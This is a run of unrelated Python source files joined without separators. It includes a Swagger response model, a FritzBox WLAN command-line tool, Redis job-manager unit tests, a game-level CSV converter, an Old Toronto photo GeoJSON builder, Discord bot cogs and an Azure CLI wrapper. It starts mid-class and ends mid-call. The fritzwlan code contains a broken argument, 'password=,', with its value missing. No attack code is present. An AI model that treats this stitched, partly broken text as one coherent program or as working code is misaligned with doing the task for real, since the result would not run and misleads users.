BaseImageResponse. :type: str """ self._uuid = uuid @property def version(self): """ Gets the version of this BaseImageResponse. :return: The version of this BaseImageResponse. :rtype: str """ return self._version @version.setter def version(self, version): """ Sets the version of this BaseImageResponse. :param version: The version of this BaseImageResponse. :type: str """ self._version = version @property def repo(self): """ Gets the repo of this BaseImageResponse. :return: The repo of this BaseImageResponse. :rtype: dict(str, str) """ return self._repo @repo.setter def repo(self, repo): """ Sets the repo of this BaseImageResponse. :param repo: The repo of this BaseImageResponse. :type: dict(str, str) """ self._repo = repo @property def images(self): """ Gets the images of this BaseImageResponse. :return: The images of this BaseImageResponse. :rtype: dict(str, dict(str, str)) """ return self._images @images.setter def images(self, images): """ Sets the images of this BaseImageResponse. :param images: The images of this BaseImageResponse. :type: dict(str, dict(str, str)) """ self._images = images @property def stack_details(self): """ Gets the stack_details of this BaseImageResponse. :return: The stack_details of this BaseImageResponse. :rtype: StackDetailsJson """ return self._stack_details @stack_details.setter def stack_details(self, stack_details): """ Sets the stack_details of this BaseImageResponse. :param stack_details: The stack_details of this BaseImageResponse. :type: StackDetailsJson """ self._stack_details = stack_details @property def default_image(self): """ Gets the default_image of this BaseImageResponse. :return: The default_image of this BaseImageResponse. :rtype: bool """ return self._default_image @default_image.setter def default_image(self, default_image): """ Sets the default_image of this BaseImageResponse. :param default_image: The default_image of this BaseImageResponse. 
:type: bool """ self._default_image = default_image @property def package_versions(self): """ Gets the package_versions of this BaseImageResponse. :return: The package_versions of this BaseImageResponse. :rtype: dict(str, str) """ return self._package_versions @package_versions.setter def package_versions(self, package_versions): """ Sets the package_versions of this BaseImageResponse. :param package_versions: The package_versions of this BaseImageResponse. :type: dict(str, str) """ self._package_versions = package_versions def to_dict(self): """ Returns the model properties as a dict """ result = {} for attr, _ in iteritems(self.swagger_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value return result def to_str(self): """ Returns the string representation of the model """ return pformat(self.to_dict()) def __repr__(self): """ For `print` and `pprint` """ return self.to_str() def __eq__(self, other): """ Returns true if both objects are equal """ if not isinstance(other, BaseImageResponse): return False return self.__dict__ == other.__dict__ def __ne__(self, other): """ Returns true if both objects are not equal """ return not self == other 1-10 class Namespace: def __init__(self, rooms, emit_fn): self.rooms = rooms self.emit_fn = emit_fn def validate(self, room_id, speaker_id): room = self.rooms.get(room_id) return not (room is None or speaker_id not in room.participants) def register_socket_endpoints(self, socketio): pass def register_rest_endpoints(self, app): pass fritzconnection/cli/fritzwlan.py0 import argparse import itertools from ..lib.fritzwlan import ( FritzWLAN, SERVICE, ) from ..core.exceptions import FritzServiceError from ..core.fritzconnection import ( FRITZ_IP_ADDRESS, FRITZ_TCP_PORT, ) def get_header(): index = 'index' status = 'active' mac = 'mac' ip = 'ip' signal = 'signal' speed = 'speed' return f'{index:>5}{status:>8}{mac:>20}{ip:>18}{signal:>8}{speed:>8}' def report_wlanconfiguration(fw, extension): fw.service = extension host_informations = fw.get_hosts_info() if host_informations: print(f'Hosts registered at {SERVICE}{extension}:') print(f'WLAN name: {fw.ssid}') print(f'channel : {fw.channel}') print(get_header()) for info in host_informations: index = info['index'] status = info['status'] mac = info['mac'] ip = info['ip'] signal = info['signal'] speed = info['speed'] print(f'{index:>5}{status:>8}{mac:>20}{ip:>18}{signal:>8}{speed:>8}') print() def report_devices(arguments): fw = FritzWLAN(address=arguments.address, port=arguments.port, user=arguments.username, password=, service=arguments.service) print(fw.fc) if arguments.service: try: report_wlanconfiguration(fw, arguments.service) except FritzServiceError as err: print(f'Error: {err}') else: for n in itertools.count(1): try: report_wlanconfiguration(fw, n) except FritzServiceError: break def get_cli_arguments(): parser = argparse.ArgumentParser(description='FritzBox HomeAuto') parser.add_argument('-i', '--ip-address', nargs='?', default=None, const=None, dest='address', help='ip-address of the FritzBox to connect to. 
' 'Default: %s' % FRITZ_IP_ADDRESS) parser.add_argument('--port', nargs='?', default=None, const=None, dest='port', help='port of the FritzBox to connect to. ' 'Default: %s' % FRITZ_TCP_PORT) parser.add_argument('-u', '--username', nargs='?', default=None, const=None, help='Fritzbox authentication username') parser.add_argument('-p', '--password', nargs='?', default=None, const=None, help='Fritzbox authentication password') parser.add_argument('-s', '--service', nargs='?', default=0, const=None, help='WLANConfiguration service number') args = parser.parse_args() return args def main(): arguments = get_cli_arguments() if not arguments.password: print('Exit: password required.') else: report_devices(arguments) if __name__ == '__main__': main() # This program calculates the average of the values # in a list. def main(): # Create a list. scores = [2.5, 7.3, 6.5, 4.0, 5.2] # Create a variable to use as an accumulator. total = 0.0 # Calculate the total of the list elements. for value in scores: total += value # Calculate the average of the elements. average = total / len(scores) # Display the total of the list elements. print('The average of the elements is', average) # Call the main function. main() parallel_accel/Server/test/redis/test_jobs.py # Copyright 2021 The ParallelAccel Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. 
# ============================================================================= # pylint: disable=too-many-public-methods, wrong-import-order """Unit test for manager module""" import datetime import importlib import os import secrets import time import unittest import unittest.mock import uuid import aiounittest import linear_algebra from parallel_accel.shared import schemas import redis from src.redis import jobs class TestJobsManager(aiounittest.AsyncTestCase): """Tests JobsManager class behavior.""" API_KEY = secrets.token_hex(16) DEADLINE = datetime.timedelta(seconds=100) JOB_ID = uuid.uuid4() @classmethod def setUpClass(cls) -> None: """See base class documentation.""" cls.patchers = [] cls.mocked_time = unittest.mock.Mock(spec=time.time) cls.mocked_time.return_value = 0 patcher = unittest.mock.patch("time.time", cls.mocked_time) cls.patchers.append(patcher) cls.mocked_redis = unittest.mock.Mock(spec=redis.Redis) cls.mocked_redis.return_value = cls.mocked_redis patcher = unittest.mock.patch("redis.Redis", cls.mocked_redis) cls.patchers.append(patcher) for patcher in cls.patchers: patcher.start() importlib.reload(jobs) os.environ["REDISHOST"] = "localhost" cls.manager = jobs.JobsManager() @classmethod def tearDownClass(cls) -> None: """See base class documentation.""" del os.environ["REDISHOST"] for patcher in cls.patchers: patcher.stop() def tearDown(self) -> None: """See base class documentation.""" for mock in [x for x in dir(self) if x.startswith("mocked_")]: getattr(self, mock).reset_mock() def test_create_job(self) -> None: """Tests create_job method behavior.""" # Test setup data = schemas.SampleJobContext( acyclic_graph=linear_algebra.Graph(linear_algebra.flip_z_axis(linear_algebra.GridSpace(1, 1))), param_resolver=linear_algebra.ParamResolver(None), ) context = schemas.encode(schemas.SampleJobContextSchema, data) job_type = schemas.JobType.SAMPLE self.mocked_redis.set.return_value = True self.mocked_redis.rpush.return_value = True # Run test job_uuid = self.manager.create_job(self.API_KEY, job_type, context) # Verification ## Verify Redis SET calls data = schemas.Job( api_key=self.API_KEY, context=context, id=job_uuid, type=job_type ) serialized_data = schemas.encode(schemas.JobSchema, data) expected_call_args = [ ( ( jobs.JobsManager.KeyType.CONTEXT.key_for(job_uuid), serialized_data, datetime.timedelta(days=7), ), ), ] data = schemas.JobResult(job_uuid, schemas.JobStatus.NOT_STARTED) serialized_data = schemas.encode(schemas.JobResultSchema, data) expected_call_args.append( ( ( jobs.JobsManager.KeyType.STATUS.key_for(job_uuid), serialized_data, datetime.timedelta(days=7), ), ) ) self.assertEqual( self.mocked_redis.set.call_args_list, expected_call_args ) ## Verify Redis RPUSH calls expected_call_args = [ ( ( jobs.JobsManager.KeyType.QUEUE.key_for(job_uuid), serialized_data, ), ), ( ( self.API_KEY, job_uuid, ), ), ] self.assertEqual( self.mocked_redis.rpush.call_args_list, expected_call_args ) ## Verify Redis EXPIRE calls args = [jobs.JobsManager.KeyType.QUEUE.key_for(job_uuid), self.API_KEY] expected_call_args = [((x, datetime.timedelta(days=7)),) for x in args] self.assertEqual( self.mocked_redis.expire.call_args_list, expected_call_args ) def test_create_job_failed_to_create_key(self) -> None: """Tests create_job method behavior: failed to create job context key""" # Test setup data = schemas.SampleJobContext( acyclic_graph=linear_algebra.Graph(linear_algebra.flip_z_axis(linear_algebra.GridSpace(1, 1))), param_resolver=linear_algebra.ParamResolver(None), ) context = 
        schemas.encode(schemas.SampleJobContextSchema, data)
        job_type = schemas.JobType.SAMPLE
        self.mocked_redis.set.return_value = False

        # Run test
        with self.assertRaises(jobs.SetJobContextError):
            self.manager.create_job(self.API_KEY, job_type, context)

    def test_flush_job_queue(self) -> None:
        """Tests flush_job_queue method behavior."""
        # Test setup
        self.mocked_redis.exists.return_value = 1
        self.mocked_redis.llen.return_value = 1
        self.mocked_redis.lrange.return_value = [str(self.JOB_ID)]

        # Run test
        self.manager.flush_job_queue(self.API_KEY)

        # Verification
        self.mocked_redis.exists.assert_called_once_with(self.API_KEY)
        self.mocked_redis.llen.assert_called_once_with(self.API_KEY)
        self.mocked_redis.lrange.assert_called_once_with(self.API_KEY, 0, 1)
        call_args_list = [((self.API_KEY,),)] + [
            ((x.key_for(str(self.JOB_ID)),),) for x in jobs.JobsManager.KeyType
        ]
        self.assertEqual(
            self.mocked_redis.delete.call_args_list, call_args_list
        )

    def test_flush_job_queue_not_found(self) -> None:
        """Tests flush_job_queue method behavior: queue not found."""
        # Test setup
        self.mocked_redis.exists.return_value = 0

        # Run test
        self.manager.flush_job_queue(self.API_KEY)

        # Verification
        self.mocked_redis.exists.assert_called_once_with(self.API_KEY)
        for command in ("delete", "llen", "lrange"):
            getattr(self.mocked_redis, command).assert_not_called()

    def test_get_job_queue(self) -> None:
        """Tests get_job_queue method behavior."""
        # Test setup
        self.mocked_redis.exists.return_value = 1
        self.mocked_redis.llen.return_value = 1
        self.mocked_redis.lrange.return_value = [str(self.JOB_ID)]

        # Run test
        queue = self.manager.get_job_queue(self.API_KEY)

        # Verification
        self.assertEqual(queue.ids, [str(self.JOB_ID)])
        self.mocked_redis.exists.assert_called_once_with(self.API_KEY)
        self.mocked_redis.llen.assert_called_once_with(self.API_KEY)
        self.mocked_redis.lrange.assert_called_once_with(self.API_KEY, 0, 1)

    def test_get_job_queue_not_exists(self) -> None:
        """Tests get_job_queue method behavior: queue not found."""
        # Test setup
        self.mocked_redis.exists.return_value = 0

        # Run test
        queue = self.manager.get_job_queue(self.API_KEY)

        # Verification
        self.assertEqual(queue.ids, [])
        self.mocked_redis.exists.assert_called_once_with(self.API_KEY)
        for command in ("llen", "lrange"):
            getattr(self.mocked_redis, command).assert_not_called()

    async def test_subscribe_job_status(self) -> None:
        """Tests subscribe_job_status method behavior."""
        # Test setup
        job_id = str(self.JOB_ID)
        job_results = [
            schemas.JobResult(
                id=self.JOB_ID,
                status=schemas.JobStatus.IN_PROGRESS,
                progress=schemas.JobProgress(),
            ),
            schemas.JobResult(
                self.JOB_ID, schemas.JobStatus.ERROR, error_message="error"
            ),
        ]
        serialized_job_results = [
            schemas.encode(schemas.JobResultSchema, x) for x in job_results
        ]
        self.mocked_redis.blpop.side_effect = [
            (job_id, x) for x in serialized_job_results
        ]
        self.mocked_redis.exists.return_value = 1

        # Run test
        async for status in self.manager.subscribe_job_status(
            job_id, self.DEADLINE
        ):
            self.assertEqual(status, job_results.pop(0))

        # Verification
        self.mocked_redis.exists.assert_called_once_with(
            jobs.JobsManager.KeyType.CONTEXT.key_for(job_id)
        )
        self.assertEqual(
            self.mocked_redis.blpop.call_args_list,
            [
                (
                    (jobs.JobsManager.KeyType.QUEUE.key_for(job_id),),
                    {
                        "timeout": (
                            self.DEADLINE
                            - datetime.timedelta(
                                seconds=self.mocked_time.return_value
                            )
                        ).total_seconds()
                    },
                )
            ]
            * 2,
        )
        self.mocked_redis.delete.assert_called_once_with(
            jobs.JobsManager.KeyType.CONTEXT.key_for(job_id)
        )

    async def test_subscribe_job_status_context_not_found(self) -> None:
        """Tests subscribe_job_status method behavior: job not found."""
        # Test setup
        job_id = str(self.JOB_ID)
        self.mocked_redis.exists.return_value = 0

        # Run test
        with self.assertRaises(jobs.shared_redis.JobNotFoundError):
            async for _ in self.manager.subscribe_job_status(
                job_id, self.DEADLINE
            ):
                pass

        # Verification
        self.mocked_redis.exists.assert_called_once_with(
            jobs.JobsManager.KeyType.CONTEXT.key_for(job_id)
        )
        self.assertFalse(self.mocked_redis.blpop.called)
        self.assertFalse(self.mocked_redis.delete.called)

    async def test_subscribe_job_status_timeout(self) -> None:
        """Tests subscribe_job_status method behavior: BLPOP timed out."""
        # Test setup
        job_id = str(self.JOB_ID)
        self.mocked_redis.exists.return_value = 1
        self.mocked_redis.blpop.side_effect = [None]

        # Run test
        async for status in self.manager.subscribe_job_status(
            job_id, self.DEADLINE
        ):
            self.assertIsNone(status)

        # Verification
        self.mocked_redis.exists.assert_called_once_with(
            jobs.JobsManager.KeyType.CONTEXT.key_for(job_id)
        )
        self.mocked_redis.blpop.assert_called_once_with(
            jobs.JobsManager.KeyType.QUEUE.key_for(job_id),
            timeout=(
                self.DEADLINE
                - datetime.timedelta(seconds=self.mocked_time.return_value)
            ).total_seconds(),
        )
        self.assertFalse(self.mocked_redis.delete.called)

    def test_get_job_status(self) -> None:
        """Tests get_job_status method behavior."""
        # Test setup
        job_id = str(self.JOB_ID)
        self.mocked_redis.exists.return_value = 1
        result = schemas.JobResult(
            id=self.JOB_ID, status=schemas.JobStatus.NOT_STARTED
        )
        serialized = schemas.encode(schemas.JobResultSchema, result)
        self.mocked_redis.get.return_value = serialized

        # Run test
        job_status = self.manager.get_job_status(job_id)

        # Verification
        self.assertEqual(job_status, result.status)
        self.mocked_redis.get.assert_called_once_with(
            jobs.JobsManager.KeyType.STATUS.key_for(job_id)
        )

    def test_get_job_status_not_found(self) -> None:
        """Tests get_job_status method behavior: job not found."""
        # Test setup
        job_id = str(self.JOB_ID)
        self.mocked_redis.exists.return_value = 0

        # Run test
        with self.assertRaises(jobs.shared_redis.JobResultNotFoundError):
            self.manager.get_job_status(job_id)

        # Verification
        self.mocked_redis.get.assert_not_called()

    def test_get_job_type(self) -> None:
        """Tests get_job_type method behavior."""
        # Test setup
        job_id = str(self.JOB_ID)
        self.mocked_redis.exists.return_value = 1
        context = schemas.SampleJobContext(
            acyclic_graph=linear_algebra.Graph(
                linear_algebra.flip_z_axis(linear_algebra.GridSpace(1, 1))
            ),
            param_resolver=linear_algebra.ParamResolver(None),
        )
        job = schemas.Job(
            api_key=self.API_KEY,
            context=context,
            id=self.JOB_ID,
            type=schemas.JobType.SAMPLE,
        )
        serialized = schemas.encode(schemas.SampleJobSchema, job)
        self.mocked_redis.get.return_value = serialized

        # Run test
        job_type = self.manager.get_job_type(job_id)

        # Verification
        self.assertEqual(job_type, job.type)
        self.mocked_redis.exists.assert_called_once_with(
            jobs.JobsManager.KeyType.CONTEXT.key_for(job_id)
        )
        self.mocked_redis.get.assert_called_once_with(
            jobs.JobsManager.KeyType.CONTEXT.key_for(job_id)
        )

    def test_get_job_type_not_found(self) -> None:
        """Tests get_job_type method behavior: job not found."""
        # Test setup
        job_id = str(self.JOB_ID)
        self.mocked_redis.exists.return_value = 0

        # Run test
        with self.assertRaises(jobs.shared_redis.JobNotFoundError):
            self.manager.get_job_type(job_id)

        # Verification
        self.mocked_redis.exists.assert_called_once_with(
            jobs.JobsManager.KeyType.CONTEXT.key_for(job_id)
        )

    def test_has_job_queue(self) -> None:
        """Tests has_jobs_queue method behavior."""
        # Test setup
        self.mocked_redis.exists.return_value = 1

        # Run test
        result = self.manager.has_jobs_queue(self.API_KEY)

        # Verification
        self.assertTrue(result)
        self.mocked_redis.exists.assert_called_once_with(self.API_KEY)

    def test_has_pending_job(self) -> None:
        """Tests has_pending_job method behavior."""
        # Test setup
        self.mocked_redis.exists.return_value = 1
        self.mocked_redis.llen.return_value = 1
        self.mocked_redis.lrange.return_value = [str(self.JOB_ID)]

        # Run test
        result = self.manager.has_pending_job(self.API_KEY, self.JOB_ID)

        # Verification
        self.assertTrue(result)
        call_args_list = [((self.API_KEY,),)] * 2
        self.assertEqual(
            self.mocked_redis.exists.call_args_list, call_args_list
        )
        self.mocked_redis.llen.assert_called_once_with(self.API_KEY)
        self.mocked_redis.lrange.assert_called_once_with(self.API_KEY, 0, 1)

    def test_has_pending_job_no_queue(self) -> None:
        """Tests has_pending_job method behavior: no job queue."""
        # Test setup
        self.mocked_redis.exists.return_value = 0

        # Run test
        result = self.manager.has_pending_job(self.API_KEY, self.JOB_ID)

        # Verification
        self.assertFalse(result)
        self.mocked_redis.exists.assert_called_once_with(self.API_KEY)
        for command in ("llen", "lrange"):
            getattr(self.mocked_redis, command).assert_not_called()

    def test_is_same_api_key(self) -> None:
        """Tests is_same_api_key method behavior."""
        # Test setup
        self.mocked_redis.exists.return_value = 1
        context = schemas.SampleJobContext(
            acyclic_graph=linear_algebra.Graph(
                linear_algebra.flip_z_axis(linear_algebra.GridSpace(1, 1))
            ),
            param_resolver=linear_algebra.ParamResolver(None),
        )
        job = schemas.Job(
            api_key=self.API_KEY,
            context=context,
            id=self.JOB_ID,
            type=schemas.JobType.SAMPLE,
        )
        serialized = schemas.encode(schemas.SampleJobSchema, job)
        self.mocked_redis.get.return_value = serialized

        # Run test
        self.assertTrue(self.manager.is_same_api_key(self.JOB_ID, self.API_KEY))
        self.assertFalse(
            self.manager.is_same_api_key(
                self.JOB_ID, self.API_KEY + self.API_KEY
            )
        )

    def test_is_same_job_type(self) -> None:
        """Tests is_same_job_type method behavior."""
        # Test setup
        self.mocked_redis.exists.return_value = 1
        context = schemas.SampleJobContext(
            acyclic_graph=linear_algebra.Graph(
                linear_algebra.flip_z_axis(linear_algebra.GridSpace(1, 1))
            ),
            param_resolver=linear_algebra.ParamResolver(None),
        )
        job = schemas.Job(
            api_key=self.API_KEY,
            context=context,
            id=self.JOB_ID,
            type=schemas.JobType.SAMPLE,
        )
        serialized = schemas.encode(schemas.SampleJobSchema, job)
        self.mocked_redis.get.return_value = serialized

        # Run test
        self.assertTrue(
            self.manager.is_same_job_type(self.JOB_ID, schemas.JobType.SAMPLE)
        )
        self.assertFalse(
            self.manager.is_same_job_type(
                self.JOB_ID, schemas.JobType.EXPECTATION
            )
        )
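# The tests above exercise a KeyType enum with a key_for() helper on
# jobs.JobsManager (members QUEUE, STATUS, CONTEXT), whose definition is not
# part of this dump. The following is only a minimal sketch, assuming
# string-valued members used as Redis key prefixes; the key format is an
# assumption, not the project's actual implementation.
import enum


class KeyType(enum.Enum):
    """Hypothetical sketch of the Redis key namespacing the tests rely on."""

    QUEUE = "queue"
    STATUS = "status"
    CONTEXT = "context"

    def key_for(self, job_id: str) -> str:
        # e.g. KeyType.CONTEXT.key_for("42") -> "context:42"
        return f"{self.value}:{job_id}"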
import csv


def tryConvertToInt(s):
    s = s.strip()
    if len(s) == 0:
        return 0
    return int(s)


levelDict = {}
with open("levels.csv") as lvl:
    reader = csv.reader(lvl)
    for rownum, row in enumerate(reader):
        if rownum == 0:
            print("header:", row)
        else:
            levelNum = int(row[0])
            levelName = row[1]
            numAsteroids = tryConvertToInt(row[2])
            numStatCoins = tryConvertToInt(row[3])
            timeLimitSeconds = tryConvertToInt(row[4])
            numMobileCoins = tryConvertToInt(row[5])
            numSaucersBig = tryConvertToInt(row[6])
            numSaucersSmall = tryConvertToInt(row[7])
            print("read wave desc:", levelNum)
            print("wave name: ", levelName)
            print("num asteroids: ", numAsteroids)
            levelDesc = {'level num': levelNum,
                         'level name': levelName,
                         'numAsteroids': numAsteroids,
                         'numStatCoins': numStatCoins,
                         'timeLimitSeconds': timeLimitSeconds,
                         'numMobileCoins': numMobileCoins,
                         'numSaucersBig': numSaucersBig,
                         'numSaucersSmall': numSaucersSmall}
            levelDict[levelNum] = levelDesc

keys = sorted(levelDict.keys())
for k in keys:
    desc = levelDict[k]
    print(' makeLevelDesc(world, {0}, "{1}", {2}, {3}, {4}, {5}, {6}, {7});'.format(
        desc['level num'], desc['level name'], desc['numAsteroids'],
        desc['numStatCoins'], desc['timeLimitSeconds'], desc['numMobileCoins'],
        desc['numSaucersBig'], desc['numSaucersSmall']))
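# The levels.csv file itself is not part of this dump. Based only on the column
# indexing above (level number, name, asteroids, stat coins, time limit, mobile
# coins, big saucers, small saucers), a tiny illustrative file could be written
# like this; the names and numbers below are made up.
import csv

SAMPLE_ROWS = [
    ["level", "name", "asteroids", "statCoins", "timeLimitSeconds",
     "mobileCoins", "saucersBig", "saucersSmall"],
    [1, "First Wave", 4, 2, 90, 1, 0, 0],
    [2, "Rock Field", 6, 3, 120, 2, 1, 0],
]

# Writes a sample file matching the expected layout (for illustration only).
with open("levels.csv", "w", newline="") as out:
    csv.writer(out).writerows(SAMPLE_ROWS)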
patcon/oldto
#!/usr/bin/env python3
"""Collect data on all the images into a GeoTempoJSON file.

Inputs:
    data/images.ndjson
    data/geocode_results.json
    data/image-sizes.txt

Output:
    data/images.geojson
"""

import argparse
import json
import os

import pandas as pd

from date_distribution import parse_year
from toronto_archives import SHORT_URL_PATTERN
from utils.generators import read_ndjson_file


def load_image_sizes(sizes_file):
    """Load image sizes into a path --> [width, height] dict."""
    # The image sizes file is the output of something like
    #   identify 'images/*.jpg' > image-sizes.txt
    # A sample line looks like:
    #   images/f0124_fl0001_id0001.jpg JPEG 1050x715 1050x715+0+0 8-bit sRGB 122804B 0.000u 0:00.009
    path_to_dimensions = {}
    for line in open(sizes_file):
        parts = line.split(' ')
        path = os.path.basename(parts[0])
        dims = [int(x) for x in parts[2].split('x')]
        path_to_dimensions[path] = dims
    return path_to_dimensions


def get_thumbnail_url(image_url):
    base_url = 'https://storage.googleapis.com/sidewalk-old-toronto/thumbnails/'
    ext = 'jpg'
    filename = os.path.splitext(os.path.basename(image_url))[0]
    return os.path.join(base_url, '{}.{}'.format(filename, ext))


def get_mirror_url(image_url):
    base_url = 'https://storage.googleapis.com/sidewalk-old-toronto/images/'
    ext = 'jpg'
    filename = os.path.splitext(os.path.basename(image_url))[0]
    return os.path.join(base_url, '{}.{}'.format(filename, ext))


def load_patch_csv(patch_csv):
    """Load the patch csv as a dict.

    All photos that have an explicit lat, lng value are returned. Photos
    occurring more than once are returned with a value of None unless their
    Fixed column is set to 'Yes' (case sensitive).

    Args:
        patch_csv: path or remote spec of the csv

    Returns:
        A dictionary keyed by photo id. If the value is None, skip this
        record; if it contains a tuple, use that as an override value for
        lat, lng.
    """
    data = pd.read_csv(patch_csv, dtype={'Fixed': object})
    fixed = set(data[data['Fixed'] == 'Yes']['Photo Id'])
    photo_id_to_lat_lng = {}
    for _, row in data[pd.notnull(data['Lat']) & pd.notnull(data['Lng'])].iterrows():
        lat_lng = (row['Lat'], row['Lng'])
        photo_id = row['Photo Id']
        if photo_id_to_lat_lng.get(photo_id, lat_lng) != lat_lng:
            raise ValueError(f'Ambiguous fix for {photo_id}')
        photo_id_to_lat_lng[photo_id] = lat_lng
    photo_counts = data['Photo Id'].value_counts()
    occurs_often = set(photo_counts[photo_counts > 1].index)

    # Construct the return dict by checking, for each id in either
    # photo_id_to_lat_lng or occurs_often, whether it is in fixed and,
    # if not, looking up its value.
    all_keys = occurs_often.union(photo_id_to_lat_lng.keys())
    return {str(key): photo_id_to_lat_lng.get(key)
            for key in all_keys if key not in fixed}
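# The override sheet consumed by load_patch_csv is not included in this dump.
# Based only on the columns referenced above ('Photo Id', 'Lat', 'Lng', 'Fixed'),
# a minimal made-up example that exercises the three code paths might look like
# this; the ids and coordinates are illustrative, not real data.
import io

SAMPLE_PATCH_CSV = io.StringIO(
    "Photo Id,Lat,Lng,Fixed\n"
    "123,43.6532,-79.3832,\n"   # explicit override -> returned as (lat, lng)
    "456,,,\n"
    "456,,,\n"                  # occurs twice with no fix -> returned as None
    "789,43.70,-79.40,Yes\n"    # marked Fixed -> excluded from the result
)
# load_patch_csv(SAMPLE_PATCH_CSV) would then return roughly:
#   {'123': (43.6532, -79.3832), '456': None}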
if __name__ == '__main__':
    parser = argparse.ArgumentParser(
        'Collect data on all the images into a GeoTempoJSON file.')
    parser.add_argument('--parent_data', type=str,
                        help='mapping uniqueID to metadata scraped from parent series/fonds/etc',
                        default='data/parent_mined_data.json')
    parser.add_argument('--geocode_results', type=str,
                        help='json results from geocoding files',
                        default='data/geocode_results.json')
    parser.add_argument('--path_to_size', type=str,
                        help='txt file containing size in pixels of each image.',
                        default='data/image-sizes.txt')
    parser.add_argument('--output', type=str,
                        help='geojson encoded version of geocodes and images metadata',
                        default='data/images.geojson')
    parser.add_argument('--patch_csv', type=str,
                        help='path to a csv to override lat/lngs. Can be local or remote. '
                             'Rows with missing lat/lngs will be skipped in the output.',
                        default='data/Old Toronto Responses - Override Sheet.csv')
    args = parser.parse_args()

    parent_data = json.load(open(args.parent_data))
    id_to_geocode = json.load(open(args.geocode_results))
    path_to_size = load_image_sizes(args.path_to_size)

    num_total = 0
    num_missing_ids = 0
    num_missing_images = 0
    num_processed = 0
    num_with_dates = 0
    num_with_geocodes = 0
    num_with_parent_geocodes = 0
    num_invalid = 0
    num_excluded_csv = 0

    patch_csv = load_patch_csv(args.patch_csv)

    features = []
    for record in read_ndjson_file('data/images.ndjson'):
        num_total += 1
        id_ = record.get('uniqueID')
        if not id_:
            num_missing_ids += 1
            continue
        if not record.get('imageLink'):
            num_missing_images += 1
            continue

        patched = patch_csv.get(id_, '')
        if patched is None:
            num_excluded_csv += 1
            continue

        parent_rec = parent_data.get(id_, {})
        num_processed += 1
        geocode = id_to_geocode.get(id_)
        if not geocode and 'lat' in parent_rec:
            geocode = parent_rec
            num_with_parent_geocodes += 1
        if geocode:
            num_with_geocodes += 1
            if patched:
                geocode['lat'], geocode['lng'] = patched

        year_range = parse_year(record.get('date', parent_rec.get('date', '')))
        year = None
        if year_range:
            num_with_dates += 1
            year = year_range[0] or year_range[1]
            # TODO(danvk): represent the range itself.

        image_url = record.get('imageLink')
        assert image_url
        dims = path_to_size.get(os.path.basename(image_url))
        # If dims is None it means that ImageMagick was not able to parse the
        # image, so it doesn't appear in our image dimension list. This could be
        # because the image was corrupt, or did not exist on the original
        # website. Regardless, it can't be displayed.
        if dims is None:
            num_invalid += 1
            continue

        features.append({
            'id': id_,
            'type': 'Feature',
            'geometry': {
                'type': 'Point',
                'coordinates': [geocode['lng'], geocode['lat']],
            } if geocode else None,
            'properties': {
                'title': record.get('title'),
                'date': str(year) if year else None,
                'url': SHORT_URL_PATTERN % id_,
                'geocode': geocode,
                'image': {
                    'url': get_mirror_url(image_url),
                    'width': dims[0],
                    'height': dims[1],
                    'thumb_url': get_thumbnail_url(image_url)
                },
                'archives_fields': {
                    k: record.get(k)
                    for k in ('date', 'physical_desc', 'citation', 'condition', 'scope')
                }
            }
        })

    print('   Total records: %s' % num_total)
    print('.excluded by csv: %s' % num_excluded_csv)
    print('...invalid image: %s' % num_invalid)
    print('.....missing IDs: %s' % num_missing_ids)
    print('.......or images: %s' % num_missing_images)
    print('')
    print('   num processed: %s' % num_processed)
    print(' ...and geocodes: %s' % num_with_geocodes)
    print(' ...from parents: %s' % num_with_parent_geocodes)
    print('   ...with dates: %s' % num_with_dates)

    json.dump({
        'type': 'FeatureCollection',
        'features': features
    }, open(args.output, 'w'))
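# read_ndjson_file is imported from utils.generators, whose source is not part
# of this dump. The sketch below shows what such a generator presumably does
# (one JSON object per non-blank line); it is an assumption, not the project's
# actual implementation.
import json


def read_ndjson_file(path):
    """Hypothetical sketch: yield one parsed JSON object per non-blank line."""
    with open(path) as f:
        for line in f:
            line = line.strip()
            if line:
                yield json.loads(line)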
BioKZM/Colonist
from discord.ext import commands
from main import client
from functions.userClass import User


class OnMessage(commands.Cog):
    def __init__(self, client):
        self.client = client

    @commands.Cog.listener()
    async def on_message(self, message):
        channel = str(message.channel)
        member = message.author
        if not message.author.bot:
            if channel == "kendini-tanıt":
                user = User(member.id)
                if user.data['messageBool'] == True:
                    channel = client.get_channel(id=910547555245494322)
                    # Message (Turkish): "You earned **250 XP** for introducing
                    # yourself in the <#901248994922098718> channel!"
                    await channel.send(f"<@{member.id}>,<#901248994922098718> kanalında kendinizi tanıttığınız için **250 XP** kazandınız!")
                    user.addXP(250)
                else:
                    pass  # await self.client.process_commands(message)


def setup(client):
    client.add_cog(OnMessage(client))


from ...pyaz_utils import _call_az


def list():
    '''
    Adaptive Application Controls - List
    '''
    return _call_az("az security adaptive-application-controls list", locals())


def show(group_name):
    '''
    Adaptive Application Controls - Get

    Required Parameters:
    - group_name -- Name of an application control VM/server group
    '''
    return _call_az("az security adaptive-application-controls show", locals())


10-100
import discord, random, asyncio
from discord.ext import commands, tasks


class Trainee(commands.Cog):
    def __init__(self, bot):
        """Trainee commands"""
        self.bot = bot
        self.guild = 681882711945641997
        self.channel = 743817386792058971
        self.role = 729537643951554583
        self.managing_ids = [690420846774321221]
        self.enabled = False

    @commands.group(invoke_without_command=True)
    async def trainee(self, ctx):
        await ctx.send_help('trainee')

    @trainee.command(name='list')
    async def trainee_list(self, ctx):
        """List trainees"""
        role = self.bot.get_guild(self.guild).get_role(self.role)
        members = [member.mention for member in role.members]
        if len(members) == 0:
            return await ctx.send('no trainees :sob:')
        embed = ctx.embed(title='Trainees', description='\n'.join(members))
        await ctx.send(embed=embed)

    @trainee.command(name='ping')
    @commands.has_guild_permissions(administrator=True)
    async def trainee_ping(self, ctx, toggle: bool = None):
        """Toggle trainee pings"""
        if toggle is None:
            toggle = not self.enabled
        self.enabled = toggle
        await ctx.send(embed=ctx.embed(
            title='Trainee Pinging',
